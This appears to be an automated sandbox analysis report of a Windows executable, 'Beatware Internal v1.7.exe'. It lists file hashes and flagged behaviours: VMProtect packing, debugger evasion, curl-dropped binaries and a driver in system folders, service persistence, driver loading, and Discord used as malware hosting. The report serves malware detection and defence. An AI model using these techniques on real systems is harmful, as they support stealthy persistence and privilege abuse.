SHA512 c7b3203f8bbc79ea3d00b2af3936cd287d50a80d20735b88f1a50e584d4aa3cbab12de2a8f06b1650fc3e2a4da7e02f0590d2f0d4e2525a5e605e10d58a3cf37

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 61380b77ec2581246e105f9a5ac63957
SHA1 c0c6bee25b24656258f44d5624d62858d8940083
SHA256 30c53ee89a2b553c2a865bace15b2ba7ea3e067c3003378da6ed4886008e123b
SHA512 a6c6b98a73cb5317f8774dee57839d6ba40710deb275519003affae01028d84858b71d1fadf5024aa2e4ec004026176752d08707c35ea84a5fa79cca6ffc7a0e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3aa7a19da5b40580fede84d6f00dd200
SHA1 958644558bb05522836d12ab4e3b710b44e18b5c
SHA256 9230e9b93054f345d93cd9f5691295ce3f2ea48586da3edad9fcce403ac4dc08
SHA512 6a1be4ec19468861de551bc7d2ae6f5994bff9094caa9c99bfe91a2f073700f653d8e98d40390f9adcfcb36ee7f6f100fe12321501e2a1a0ffa142caa665a438

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d304f60dc7510d13d355d30b2a3bc4f1
SHA1 7bbbfc2f8cccc9a9957f10a56ccd84dbb97be576
SHA256 b58b7fd8ecb5f9936d1feb81392abfc7e1bf4a0a619b3212c42276eea40db6b2
SHA512 a99bc59bbbe6529432d81690d03dcd20dae65a7e40c13a8570bfd929f9b2b1bacfccf69f8d0a23a40a2bc0b8514d1a6732e67731506791523d3bafaf5508687e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9ee81b1f7776ad26ced1c977f02cb105
SHA1 cd8ae126d8e5341c15f341f87c6cf6e335a5a38f
SHA256 3fc60f193cef062573d86f3337b7262f1fa066bda140ebcb23990b449097b7a5
SHA512 860ac75d746ea19a75553276cdc89b1a4d2f53220e8d2e74e7ca96ee0595172a3eacae6d346f43fa8405740d4f2a2fdd5c23d1959561242dccd3f30b5996515e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9aba98bf21237d27d7fd5a3bed108251
SHA1 3a36568cff37308c251fa5b498b3367059177de5
SHA256 c0dc52c876f6d4c945f7204ad0bad93d742b66e81e28aa33b1e8ca3ac5471ed2
SHA512 e144e28fa52be7de06a1d5b6e89b6c81b2e28ab1e8b66423f9160b95ddbab87ff0821c5ce3037161879f8b848fc6c76e11b3d560a12efc3131fcf253223efca5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 082519e6126aaae6e688a24356c9eba8
SHA1 22f81abc9547b70f3f07c0a650beaec2a9997f89
SHA256 3ae1373f76646b674d003d61d6dd037b6ca45b7452d3f4e675de373be426eaf4
SHA512 b379b5c4ef70e4e4a55dbe284ca0d0ee6e84ba5588ecbf24deb54e74f0bf8b81abd707ebfe780f6ce035a0c6357d3e9c7f8a61592ce5e0ff37e0f6228a7dc44f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6341b20d1eff64ecc8f4f0513f4be158
SHA1 e271e09234ea41dd80709ab6e77c91ce3a1ed954
SHA256 bef781fc2e9188029565cae2d1a4ae8c0565d2a4252c5a041bd57a9496e39b74
SHA512 fffaddf0cdfa7f6d0f0ef860d80328cd745e6fc79048acfe4f982ae93e8c23a0b7b8c0f78c125d7cfa32039ffb3f6b847d83f7568f18e1fe54b2f39fc4c1fa63

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 243691481c4905a07eb675b43ed5076c
SHA1 f1c3aff9a0656f68eef9ec5f2fb3f3927314e8fc
SHA256 0bf9858a924bf9e74712a7ea201adc84e511bccf0d9c05bed495d6780594299f
SHA512 2e356610e419d49e58e9c6ee693f66c77e677791effbf27608f46edc67ccae3e4f4aadff7da018ae8086becfcfa03fa6936a01243b01bb0bcb7a5a16b31908ea

memory/2912-689-0x000000013F4B5000-0x000000013F81E000-memory.dmp

memory/2912-690-0x000000013F420000-0x000000013FD9B000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b2b7cd4963523752c7a034a5d78afed0
SHA1 6afb91665c2ea1eddfcec1001554ee7d76478d31
SHA256 2e2ab440ef26deb59db7c7547a2d8b2ea76c91fe68ec0b0b1054c562ffabafdd
SHA512 0a3f09ce84a0e51f2dfbd3894f3272b13a5aa586640385696190ab00866122efe613f49b2d51a5ffc778f8dc4d21e6e9b9a88526cfa5b454e8f729549a831099

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9146dd516c60f75ebfe78f1815fe3852
SHA1 30d5dd7614dfe44c2bbc4463ee4abd38ae091f05
SHA256 11c38078e88daa552d5f35f09e6cca86fd4af8671200a14ecb63ed1193edaf21
SHA512 f18cca3e3e1fba57c4d40cd6e30ed8d0cecfdd3953675aecf0590d5126ed2696e5f560f66fe765411c4bbc5d34b2fb2b22e281f2c57c4c6c2652bdb34cc47963

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 6c11486d4655bcda7bd29fb57d559270
SHA1 f6e15371ce9a9d274037af6c12dfb4240f5fdb53
SHA256 caa4276737fbc4558aa3a4d4eb729cbe96dbc39d4742aa5a5ed25cfccad0350d
SHA512 48a3dc5633b6123c55228eaf8f8dca64f4bd06ec8ce22bcfd26d6d80c1792295122462cb3f2b238909759e3405aadbccbe172922874e9a8333aa409487c2ce21

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 39246c099109ebd5ef074301940ac4f2
SHA1 6572028d5b30dd5d4b1509ec3a520950fcdcfc22
SHA256 5a4afd72be4c1d0842f67e6c0816a15331c744dae803a469f27965edd3d1de9c
SHA512 b9a22e6f41f9c59a0c8aaf191846faec984c7ba68ce0c96c010abcff16a13f8e02c4ff96c972f85c341407168f69d4e4e095df38abcd67244a2b9512c572338c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 77f635fc0bc6452f533b4ea6071ec177
SHA1 07729430ed6f511512fd35797e89bc909919fb1e
SHA256 65e8945e4a987b1245526f577039294d9380e9aec634db28f1ed0a13f82c3e96
SHA512 a4b5f2b96133259d735c02e20eb50d58b5ca2a342d5e991e027e04dc059e47dca6035dc475db76f498f3342925a6f87807397537e1fbf9880c4586984c7c6900

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dfa0c8ea16c75c62d04538e229e69dbb
SHA1 f7b96ff04507da51b97f04d3feea0c5540aae2ef
SHA256 86c62e3689563b76eee8fb18d7800038ed6a01662fd6c9bfd01fdb123b79ed85
SHA512 70ad14440acdf60633ea2388ad35050ff9686a4ad8391da1602e542ee0e35033e64d936983229a5b8ccbda78456a19a8efbc4c213acc53caf58b1f358fddcb42

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9db1e9c2e323e27073e9643dcf40052f
SHA1 f519560bf3ebe1cd8660bad71ea74d4f46e85df2
SHA256 721396b647625904b300e8e480c252b2c3b474d78126878e60a764497ccd3f6d
SHA512 a2bac5245968d95f7bc0646b10cb37d34017e301a522e797f2ef587e99bb7a2f78a4b327449d8459f3b54ef4f91407a9a88ddf0292cfd4bc27d811494fe1a6c7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a2056df3b8201f762ee58afcf684975c
SHA1 2fd4ff71e8d9d358229004a3e78dff87663fa850
SHA256 71e85a074fd8097e2d11f6d3fbdf448b4f290c4297595848c1d2cfb10f198765
SHA512 ce1573cc17aa59a081b4680ea012430f8ac9ad43fec107214ed165f741f1574f06bf99ee9f8c5a75398014144da6d5c3c0e13c1f13d908b1fcacdf871e7190ea

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 f4e06021b807c04419806280a377a3b4
SHA1 6f4e73926ed432bb96db7b80c6393775aa9de9eb
SHA256 4464ea7e167fc79d7c6f850801b780ce441872ac1cfc11fd4ee41d2406e2c340
SHA512 0f21cf557bb2f7b775bb918893416d92601e7106e869481b2f52d68e8e3e4ea3a72dd73e3b665509f040c89653e346ad66d7f82dac9581490d093bdbf2c310b8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 233bf4c38c6751425f471e7234ac8548
SHA1 209696b99cbb2d1709baf3678b370801513c6c01
SHA256 0649d3d8ee09482fd54cbbc2b3df2814472f8f116eafb59c28f5513cb30ea115
SHA512 82ce2a40a5174ced46fd9e353650f5d2a7662c8f2b4d09875d3245cd6802ba8bcf4aa6aebd7d16bcdcc242c34211e490eb7d5e690f823f3e5b53fa5c4d6b24c1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2f3c3d75ebc75857be68ea00ee33f22f
SHA1 5d70d5240752791d02fa5109a5d761c50083b172
SHA256 7e4b435ac446039319274577350956846ee1f1e472b2ae6e11c7c8a3b28e720f
SHA512 dc5ee96dcf1b05609a499ab89ebca0aa626241cf75a35da00a9e028c4a80f8699259a6966d7ff4cf2d891483933e28bb804175eee038ddb4a9ba4b8509d7cb61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d7c4a725ec0e9fc64f20a741605605af
SHA1 6bb9879569fc0cd236c0b80d65b1db074bd5fab8
SHA256 1f051bfebc36dea9d41b2f72a516e5964f99806846185acfec0582d883556574
SHA512 b3642b21d840a6e9d3678221120e93e50b41a56419905e32b0d89d723bf36cb4f1ca9c74a5bc7bac49cfd0887a07fb70a50922e90ec7ac095f87a41ae036fbdc

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 23:15

Reported

2024-05-10 23:16

Platform

win10v2004-20240508-en

Max time kernel

73s

Max time network

69s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"

Signatures

Downloads MZ/PE file

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lntYyeTrEfNahTUmehqQzIIO\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\lntYyeTrEfNahTUmehqQzIIO" C:\Windows\System32\gainlol.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System32\gainlol.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\gainlol.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\System32\internal.dll C:\Windows\system32\curl.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Fonts\arial.sys C:\Windows\system32\curl.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1337824034-2731376981-3755436523-1000\{667DCD50-3ED8-4FFB-A819-014180711166} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Windows\System32\gainlol.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\gainlol.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2368 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 3188 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3188 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3188 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3188 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3188 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3188 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2368 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
